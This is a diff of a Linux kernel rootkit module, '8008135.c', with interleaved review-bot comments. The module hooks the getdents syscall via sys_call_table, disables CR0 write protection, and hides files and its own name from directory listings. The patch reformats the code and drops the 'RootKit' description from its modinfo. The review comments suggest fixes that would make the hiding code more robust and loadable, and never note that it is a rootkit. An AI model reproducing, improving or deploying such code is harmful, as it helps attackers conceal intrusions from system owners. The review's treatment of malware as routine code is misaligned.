diff --git a/8008135.c b/8008135.c
index a706335..0eb6a63 100644
--- a/8008135.c
+++ b/8008135.c
@@ -1,3 +1,24 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+/**** Includes ***************************************************************
+*******************************************************************************/
#include
#include
#include
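Review bot: The new file header names the file `main.c` while the patch is against `8008135.c`; change the comment line to ` * 8008135.c`. The header also declares the module GPLv3 whereas the removed modinfo said "GPL v2" — the Linux kernel is GPLv2-only and its module loader recognizes only GPLv2-compatible license strings, so stating GPLv3 here is at odds with how the module will be loaded; confirm which license is actually intended. The closing `If not, see .` appears to have lost its URL, presumably `<https://www.gnu.org/licenses/>`.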
@@ -6,58 +27,97 @@
#include
#include "sysgen.h"
+
+/**** Defines *****************************************************************
+*******************************************************************************/
+
#define GETDENTS_SYSCALL_NUM 78
#define WRITE_PROTECT_FLAG (1<<16)
+
#define HIDE_PREFIX "8008135."
-#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX)-1)
+#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
+
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
+/**** Modinfo ****************************************************************
+*******************************************************************************/
+MODULE_LICENSE("GPLv3");
+MODULE_AUTHOR("JanKoernerEnterprises");
+MODULE_DESCRIPTION("8008135");
+MODULE_VERSION("0.1");
+/**** type *******************************************************************
+*******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
- unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
- char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
+ unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
+ char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
};
-MODULE_AUTHOR("JKE");
-MODULE_LICENSE("GPL v2");
-MODULE_DESCRIPTION("RootKit for Ubuntu-16");
+typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
+ struct linux_dirent __user *dirent,
+ unsigned int count);
+
+/**** var ********************************************************************
+*******************************************************************************/
-typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count);
sys_getdents_t sys_getdents_orig = NULL;
-// our new getdents handler
-asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) {
+/*** FUNCTION ****************************************************************
+* NAME: sys_getdents_new
+* DESCRIPTION: function overriding the original getdents
+* PARAMETERS: -
+* RETURNS: -
+*******************************************************************************/
+asmlinkage long sys_getdents_new(unsigned int fd,
+ struct linux_dirent __user *dirent,
+ unsigned int count) {
int boff;
struct linux_dirent* ent;
+
long ret = sys_getdents_orig(fd, dirent, count);
+
char* dbuf;
+
if (ret <= 0) {
return ret;
}
+
dbuf = (char*)dirent;
+
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
+
ent = (struct linux_dirent*)(dbuf + boff);
- if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix
- || (strstr(ent->d_name, MODULE_NAME) != NULL)) { // or if it has the module name anywhere in it
+ // if it has hide prefix or module name anywhere, hide it
+ if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
+ || (strstr(ent->d_name, MODULE_NAME) != NULL)) {
+
// remove this entry by copying everything after it forward
- memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));
// and adjust the length reported
+ memcpy(dbuf + boff, dbuf + boff + ent->d_reclen,
+ ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
+
return ret;
}
-static int __init lkm_example_init(void) {
+/*** FUNCTION ****************************************************************
+* NAME: 8008135_init
+* DESCRIPTION: initializing Kernel Module
+* PARAMETERS: -
+* RETURNS: int
+*******************************************************************************/
+static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
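Review bot: `MODULE_LICENSE("GPLv3")` replaces the previous `MODULE_LICENSE("GPL v2")` with a string the kernel's module loader does not treat as GPL-compatible (the accepted forms are "GPL", "GPL v2", "GPL and additional rights", "Dual BSD/GPL", "Dual MIT/GPL", "Dual MPL/GPL"), so loading this module taints the kernel as proprietary and denies it GPL-only exports; keep `MODULE_LICENSE("GPL v2");` or use `"GPL"`. In sys_getdents_new the reformatted `memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));` copies between overlapping ranges of the same buffer, which memcpy does not guarantee to handle — use `memmove`, and since a zero `d_reclen` would make the loop spin forever, guard it with `if (ent->d_reclen == 0) break;`. Note also that `dirent` is `__user` memory that is read and rewritten directly through strncmp/strstr/memcpy with no copy_from_user/copy_to_user, which will likely fault on kernels with SMAP enforced — a pre-existing problem this patch keeps. The new header blocks say `PARAMETERS: -` and `RETURNS: -` for a function that takes fd/dirent/count and returns long, and `NAME: 8008135_init` for a function actually named init_8008135 (a C identifier cannot begin with a digit); list the real parameters and return, and use the real name. init_8008135's body continues outside the hunk.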
@@ -78,7 +138,14 @@ static int __init lkm_example_init(void) {
return 0;
}
-static void __exit lkm_example_exit(void) {
+
+/*** FUNCTION ****************************************************************
+* NAME: 8008135_exit
+* DESCRIPTION: unloading Kernel Module
+* PARAMETERS: -
+* RETURNS: -
+*******************************************************************************/
+static void __exit exit_8008135(void) {
// allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
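Review bot: The new header block names the function `8008135_exit` while the definition is `exit_8008135`; make the NAME line `* NAME: exit_8008135` so the comment matches the symbol. The pre-existing comment `read onlu pages` above write_cr0 should read `read only pages`. Clearing WP in CR0 and restoring it this way is not guarded against preemption or migration to another CPU, which is pre-existing and outside what this patch changes, but a `preempt_disable()`/`preempt_enable()` pair around the pointer swap would make it safer. exit_8008135's body continues past the hunk.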
@@ -88,5 +155,7 @@ static void __exit lkm_example_exit(void) {
printk(KERN_INFO "Old syscall back\n");
}
-module_init(lkm_example_init);
-module_exit(lkm_example_exit);
\ No newline at end of file
+
+// Setting pointers to init-/exit-functions
+module_init(init_8008135);
+module_exit(exit_8008135);
\ No newline at end of file